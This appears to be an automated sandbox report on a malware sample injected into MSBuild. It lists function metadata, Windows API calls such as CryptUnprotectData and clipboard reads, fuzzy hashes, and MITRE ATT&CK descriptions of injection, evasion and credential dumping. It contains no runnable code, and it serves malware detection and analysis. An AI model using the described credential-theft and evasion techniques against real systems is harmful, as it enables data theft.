Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: BE
API String ID: 237503144-2233502311
Opcode ID: b37512823ed82f07eec402ac5ec63761c754146bd8c09e3361f71e39d7c7a991
Instruction ID: 7506d323152bd8169220679f0f180df36f1cb5ad2bea201e3c2e1baadad06111
Opcode Fuzzy Hash: b37512823ed82f07eec402ac5ec63761c754146bd8c09e3361f71e39d7c7a991
Instruction Fuzzy Hash: D061AB701083518BE724DF14C890BABB7E1FFC5704F148A1DE8DA9B285E7749949CBA6

Function 0043864A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

17, xrefs: 004386A9
17, xrefs: 0043830A

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID: 17$17
API String ID: 0-4233266724
Opcode ID: bd68f39e99eeb81f2292b78e620a3f71e84a278828ca7f0afd4750123b6c6279
Instruction ID: 30bc7931dced1af7ac4c6f9d0434c346eff0a4b35e8b4806f2d22c0c74591460
Opcode Fuzzy Hash: bd68f39e99eeb81f2292b78e620a3f71e84a278828ca7f0afd4750123b6c6279
Instruction Fuzzy Hash: 4941AFB4540700CFDB14EF25EC91616BBE1FB0A310F14986DE8868AB26E73CE461CF59

Function 004382A6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 0043836A

Strings

17, xrefs: 0043830A

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: LibraryLoad
String ID: 17
API String ID: 1029625771-2050153417
Opcode ID: 407790e7f8f50104050cfca858ca54130e2f8b3d274ef5853e8c9fbaab5e0cb8
Instruction ID: a08a19d0897ef156bb44d491b506e6b1cdd0808cfb5648dc64a0ecc362562bcb
Opcode Fuzzy Hash: 407790e7f8f50104050cfca858ca54130e2f8b3d274ef5853e8c9fbaab5e0cb8
Instruction Fuzzy Hash: 5C219FB4640300CFD714EF25EC91616BBF1FB06315B14986ED8868BB26E738E462CF59

Function 0041CEF8 Relevance: 3.1, APIs: 2, Instructions: 134COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0041CFFB
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041D029

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 3312c03c78907f9166d939215c979b3fd95f8790b82ae46502f6c220606cde0d
Instruction ID: eb86117866d945d2705fe327d60a3420c56ddb441ac3f7b4156d7c824608bcd1
Opcode Fuzzy Hash: 3312c03c78907f9166d939215c979b3fd95f8790b82ae46502f6c220606cde0d
Instruction Fuzzy Hash: 97519CB41007009FE724CF19D880B16BBB1EF4A750F258A9DE9A55F7A6C731E842CF85

Function 0041592F Relevance: 1.7, APIs: 1, Instructions: 200encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAD

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: a287517f34824a3bf384132246b69a47dfecdf06349c6df0b143b5d27b57d290
Instruction ID: 3a667ff3454842c785eb92ec6cb7f75f1e590c08ad6486e92f650cf018a2a703
Opcode Fuzzy Hash: a287517f34824a3bf384132246b69a47dfecdf06349c6df0b143b5d27b57d290
Instruction Fuzzy Hash: B571BEB15083818FD314CF28C48179BBBE2AFD5344F588A2EE1E987392D779D849CB56

Function 00438C50 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043BA5C,005C003F,00000006,?,?,00000018,00000E0F,?,CA), ref: 00438C76

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Function 0042D4DE Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e980e8285af8cc75157b1f73a86491181f30e96f105d6a2d6b105177fd6976e5
Instruction ID: 2a082873a06e75f1109075f5a563285c9bf5a1c47b260c01c4965784b9fd4782
Opcode Fuzzy Hash: e980e8285af8cc75157b1f73a86491181f30e96f105d6a2d6b105177fd6976e5
Instruction Fuzzy Hash: 12F0D4755087418BC760EF25C54538FBBE0BBC8318F51C82DE88997395CBB5A8888F82

Function 0042A2ED Relevance: 40.3, APIs: 1, Strings: 22, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0042A41D

Strings

-, xrefs: 0042A3A3
B, xrefs: 0042A33B
#, xrefs: 0042A353
?, xrefs: 0042A333
%, xrefs: 0042A363
H, xrefs: 0042A32B
D, xrefs: 0042A2FB
e, xrefs: 0042A34B
i, xrefs: 0042A35B
*, xrefs: 0042A39B
9, xrefs: 0042A303
=, xrefs: 0042A323
K, xrefs: 0042A31B
I, xrefs: 0042A30B
), xrefs: 0042A383
;, xrefs: 0042A313
!, xrefs: 0042A343
k, xrefs: 0042A36B
z, xrefs: 0042A38B
+, xrefs: 0042A393
', xrefs: 0042A373
P, xrefs: 0042A37B

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: AllocString
String ID: !$#$%$'$)$*$+$-$9$;$=$?$B$D$H$I$K$P$e$i$k$z
API String ID: 2525500382-3880154102
Opcode ID: 7c2b0187cbf50d657652b52235cb37ac384dce932d34ce65bbe0c4b333584f6b
Instruction ID: b8eb1df4a728873e96e99503bd3c88436959daf62c36cc3e5a9d5f1745c9d864
Opcode Fuzzy Hash: 7c2b0187cbf50d657652b52235cb37ac384dce932d34ce65bbe0c4b333584f6b
Instruction Fuzzy Hash: 1031C37020D3C08EE336CA28D0583DBBFE25BA7308F48485DD5D94A282C7BA454A8767

Function 0041764E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000), ref: 0041768D
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?), ref: 004176C3

Strings

2wE, xrefs: 004176DA

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 2wE
API String ID: 237503144-3194401474
Opcode ID: 611003672a94f86da9f859a62908065673ae299162a2181766fdca5a6a383a15
Instruction ID: 10558a4b843bba572430d8d0774d4b44b46ff8c952e476b2c363e0d4f9f059a4
Opcode Fuzzy Hash: 611003672a94f86da9f859a62908065673ae299162a2181766fdca5a6a383a15
Instruction Fuzzy Hash: EA1142B4610A01AFD734DF29DC45A13BBF5EB85314F10861DF8A6877D0E770A8158BA5

Function 00408E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 00408EE7

Strings

primarily often on modified in or uses the on the play of is that eleet replacements leetspeak, ways other via used resemblance spellings similarity a internet. glyphs of it system or their character reflection, xrefs: 00408EA4

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: ExitProcess
String ID: primarily often on modified in or uses the on the play of is that eleet replacements leetspeak, ways other via used resemblance spellings similarity a internet. glyphs of it system or their character reflection
API String ID: 621844428-744483612
Opcode ID: 31a9e0c74d747087b60decf9ced0de02774cc2f0ae10abf68d8517e2935416a2
Instruction ID: 98d979e8d1f8271b92ff5c640343200f4b3ab9cc7b8630f29497534f27368aaf
Opcode Fuzzy Hash: 31a9e0c74d747087b60decf9ced0de02774cc2f0ae10abf68d8517e2935416a2
Instruction Fuzzy Hash: 6BF06D7081870196CA503B75DB0622BBAA8AB51319F10003FE9C1B61D2EE7C481F57DF

Function 00427062 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 392COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00427157

Strings

qOtJ, xrefs: 00427390

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: qOtJ
API String ID: 3960555810-1415300708
Opcode ID: 9ed80bf50477278f9efd2517d9f6c70f34fdd715102ec1273fab0711fe8b9f86
Instruction ID: ddd6f29b25ed8a156d44547f189f4453f4b89a07aab67fdeac9dbc7eff17720a
Opcode Fuzzy Hash: 9ed80bf50477278f9efd2517d9f6c70f34fdd715102ec1273fab0711fe8b9f86
Instruction Fuzzy Hash: 8FC1B474208291CFD729CF29D090726FBE2FF9A304F68859EC4D68B356C739A845CB95

Function 00434DAD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00434DDF

Strings

\, xrefs: 00434DAD

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: InformationVolume
String ID: \
API String ID: 2039140958-2967466578
Opcode ID: 4546e5f721cf610e40f90ca39cb59e7a4eff62814b5b94167e1f257b6d9815e8
Instruction ID: 829a4678ba2dd3dd1dd258350cb19a37661fe774dcfee8343bee9cc87edc43db
Opcode Fuzzy Hash: 4546e5f721cf610e40f90ca39cb59e7a4eff62814b5b94167e1f257b6d9815e8
Instruction Fuzzy Hash: 45E04FB93D03007BF3286B10EC13F1A36A9A742745F21442DB292A91D0DAB868148E1E

Function 00414760 Relevance: 3.2, APIs: 2, Instructions: 174COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041479A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 004147C8

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: e230bcd44a9ef06a4679c11cbee609a99fa6bc0358a8576fb67d8b2b3ef182a1
Instruction ID: 1fb4d0208cb9fa11ff189c5681080f3e46b158539fa05021a27b0e744d6e87e9
Opcode Fuzzy Hash: e230bcd44a9ef06a4679c11cbee609a99fa6bc0358a8576fb67d8b2b3ef182a1
Instruction Fuzzy Hash: CD5116746043008BE724DF28C851BABB7E5EFC6314F144A1DF5A59B2E0D778D940CB96

Function 004384AB Relevance: 1.6, APIs: 1, Instructions: 93libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 004385E4

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2faea0725e2eebb87ed941b92f977c344c4d66512c1914c53b0c763caac228fa
Instruction ID: f595093ba3ee5e2bfc91a55b90ed065bea1f94f217125e9baa9df7d93a4c3890
Opcode Fuzzy Hash: 2faea0725e2eebb87ed941b92f977c344c4d66512c1914c53b0c763caac228fa
Instruction Fuzzy Hash: C5312A78205B43AFD3188F15C890626FBB1BB89310F548A2DD5A647F54C738B552DB94

Function 004383B7 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?), ref: 0043846B

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c9c171ccbaa7ff9692fad9a1cc99a9c878355d12e0fe0630b41d1474ca663176
Instruction ID: 0c318ffcca8c1767b0691d815b4a2294eeff893780b6ede518a40f363c11d7dd
Opcode Fuzzy Hash: c9c171ccbaa7ff9692fad9a1cc99a9c878355d12e0fe0630b41d1474ca663176
Instruction Fuzzy Hash: 0321CAB42417828BDB18DF61D9E07177BA2FF5A304F18846CC8864FB6ADB34E844CB58

Function 00438BCF Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00438C20

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 257f412e89414fd8022ce49eed0758758a6bb88dae10292fc8be644715a8f883
Instruction ID: 26a556e0a76d1831cfaeaa6d4ec2c14a841e2878affb252de8711885f3e51e29
Opcode Fuzzy Hash: 257f412e89414fd8022ce49eed0758758a6bb88dae10292fc8be644715a8f883
Instruction Fuzzy Hash: 570186342457808FD3218B18C990596FBF1FF0B710B04999AE5A687A63C335EC42CB54

Function 00436C10 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 00436C1D

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6c7dda4a9d97658a560d616a13542526ba0bf4958f38e2e2407e4ce80cc50cda
Instruction ID: f9683c714a6a61c0c86dd095972dc8c1d8a34eac03989d1e39b029178cef77ab
Opcode Fuzzy Hash: 6c7dda4a9d97658a560d616a13542526ba0bf4958f38e2e2407e4ce80cc50cda
Instruction Fuzzy Hash: B1C01231100205EBCA14DB80EC20AA47725E744315F100069E509425A0C6315921DA40

Function 00436AE2 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00436AE6

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cc64c9807242cd09c9b96dbdd0e7a29bbe2467af3302191d983f3715906f0d60
Instruction ID: 16a40d57eba595d07e25bbb04b4e71a8b8b95c49ad386cb0a1e0a24629cb0d6c
Opcode Fuzzy Hash: cc64c9807242cd09c9b96dbdd0e7a29bbe2467af3302191d983f3715906f0d60
Instruction Fuzzy Hash: 27B0127B74010464DA2022987C01BED731CC7C0132F000063E70891040412151240160

Non-executed Functions

Function 0042EF60 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 164clipboardCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 0042EFBB
OpenClipboard.USER32 ref: 0042EFD1
GetClipboardData.USER32 ref: 0042EFF0
CloseClipboard.USER32 ref: 0042F128

Strings

m, xrefs: 0042F09A
G, xrefs: 0042F08A

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID: G$m
API String ID: 1647500905-1216331284
Opcode ID: 0d520eccc92950579300fb5ad5db98749033eafb1dabe1e8f9681f288c9d97b8
Instruction ID: ba54923a1079b641d482b0bf98d98a5b523b471b8413af55b5e8fd8f019fe5b5
Opcode Fuzzy Hash: 0d520eccc92950579300fb5ad5db98749033eafb1dabe1e8f9681f288c9d97b8
Instruction Fuzzy Hash: DF617074508781CFC720DF38D585616BBF1AF16324F548AADE4D58B392D335A806CBA6

Function 004224AC Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 440COMMON

Download Yara Rule

Strings

R^CH, xrefs: 00422595
5U&S, xrefs: 00422B1A
OvNG, xrefs: 004225A5
;I9W, xrefs: 00422B12
b&B, xrefs: 0042264B

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID: 5U&S$;I9W$OvNG$R^CH$b&B
API String ID: 0-2234602376
Opcode ID: 00cd649e7659d794f7ca12f17f82c337af901bf662b709bdccf46a1003a70bb2
Instruction ID: f7e0fbace6299427b8793592d0a3ba05104fb58289f48f2c3e33420b4ced35e1
Opcode Fuzzy Hash: 00cd649e7659d794f7ca12f17f82c337af901bf662b709bdccf46a1003a70bb2
Instruction Fuzzy Hash: 3CF1ADB06083509FD324CF29D89072BBBE1FFCA314F55892DE99987391CB799845CB86

Function 00410DA2 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 336COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00411BE4
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 00411C1A

Strings

b, xrefs: 0041106B
/QD, xrefs: 00411C20

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: /QD$b
API String ID: 237503144-3552961473
Opcode ID: ed57fe06c902b3b6249c39f3fa634217b23a3aaf49a3cb7b691522c9f8e86489
Instruction ID: 7a871bc545a4812b2f67ea8769ad65d1a29418481b0f0278322f73e1f015946f
Opcode Fuzzy Hash: ed57fe06c902b3b6249c39f3fa634217b23a3aaf49a3cb7b691522c9f8e86489
Instruction Fuzzy Hash: 39D17C745193808FE3B4CF14C884BEFB7E9AF89715F14482EE48887391DB789885CB56

Function 0042F985 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0042FA02
GetSystemMetrics.USER32 ref: 0042FA13
DeleteObject.GDI32 ref: 0042FA77
SelectObject.GDI32 ref: 0042FAC5
SelectObject.GDI32 ref: 0042FB65
DeleteObject.GDI32 ref: 0042FB9F

Strings

, xrefs: 0042FB38

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 5954fd384bcccd35ae812532578bd36b2eb7eb600e9f84f9b1fd4c31eb2a23c0
Instruction ID: 377d0be6162d44d5f37c758a093b900a424e6b451a4d6c73318832d57b066feb
Opcode Fuzzy Hash: 5954fd384bcccd35ae812532578bd36b2eb7eb600e9f84f9b1fd4c31eb2a23c0
Instruction Fuzzy Hash: 26917AB4A04B00DFC750EF29D595A1ABBF0FB49300F10896DE99ACB360D731A849CF92

Function 00411F74 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000006,?,00000200,?), ref: 0041204C

Strings

VD, xrefs: 004120A5

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: VD
API String ID: 237503144-2036460487
Opcode ID: 658a2b22f3fd0e536ad209e82ee58846eda13c2583f5e0e0d9e4fe231bfa25ca
Instruction ID: 9e45f8f0a49f52eb72c9d7ab643889174a9a9dce60aabbbf0de66af8cf0b0dce
Opcode Fuzzy Hash: 658a2b22f3fd0e536ad209e82ee58846eda13c2583f5e0e0d9e4fe231bfa25ca
Instruction Fuzzy Hash: 09517F702183818AE764CF04C890BDBB7F5EFC6344F14892DE589CB2A1DBB49486CB5A

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
